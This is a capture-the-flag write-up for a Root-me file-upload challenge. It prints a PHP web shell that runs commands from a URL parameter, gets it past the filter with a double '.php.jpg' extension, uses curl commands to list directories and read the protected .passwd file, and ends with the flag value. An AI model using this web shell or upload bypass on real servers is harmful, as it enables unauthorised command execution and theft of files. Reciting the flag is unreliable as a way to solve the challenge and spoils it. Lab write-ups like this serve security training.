Root-me

File Upload - Double Extensions

Our goal is to upload a PHP code and get access to the .passwd.

Since the title already tells us what to go we’ll upload a PHP that will allow us to execute commands on the system.

<?php if($_GET['cmd']) { system($_GET['cmd']); } ?>

We’ll name it mine.php.jpg and upload it. Once upload it we’ll retrieve the link where it was uploaded and send our commands.

It would look something like this.

curl http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/randomsomething/Double_extensions.php.jpg?cmd=ls

Double_extensions.php.jpg

randomsomething will be a random string generated by the upload script. We can see that our ls command was executed and gave us the content of the folder. Now it’s just a matter of find the file .passwd and reading it.

curl http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/aau41u6lqc9s13gmamjv2e5722/Double_extensions.php.jpg?cmd=ls%20-lah%20../../../

total 40K
drwxr-s---  4 web-serveur-ch20 www-data  4.0K Jun 13 17:13 .
drwxr-s--x 56 challenge        www-data  4.0K Sep 13 10:22 ..
-r-x------  1 challenge        challenge  666 Jan 14  2017 ._init
-r--------  1 challenge        challenge  274 Nov 16  2014 ._nginx.http-level.inc
-r--------  1 challenge        challenge  904 Feb 27  2017 ._nginx.server-level.inc
-r--------  1 challenge        challenge  645 Nov 11  2016 ._php-fpm.pool.inc
-r--------  1 web-serveur-ch20 www-data    26 Dec 21  2016 .passwd
drwxr-s---  8 web-serveur-ch20 www-data  4.0K Jun 24  2015 galerie
-rw-r-----  1 web-serveur-ch20 www-data  3.9K Nov 11  2016 index.php
drwxrwxrwx  2 web-serveur-ch20 www-data  4.0K Nov 11 17:01 tmp

Found the file, we needed to go back up 3 folders. Now let’s run cat on it.

curl http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/aau41u6lqc9s13gmamjv2e5722/Double_extensions.php.jpg?cmd=cat%20../../../.passwd

Gg9LRz-hWSxqqUKd77-_q-6G8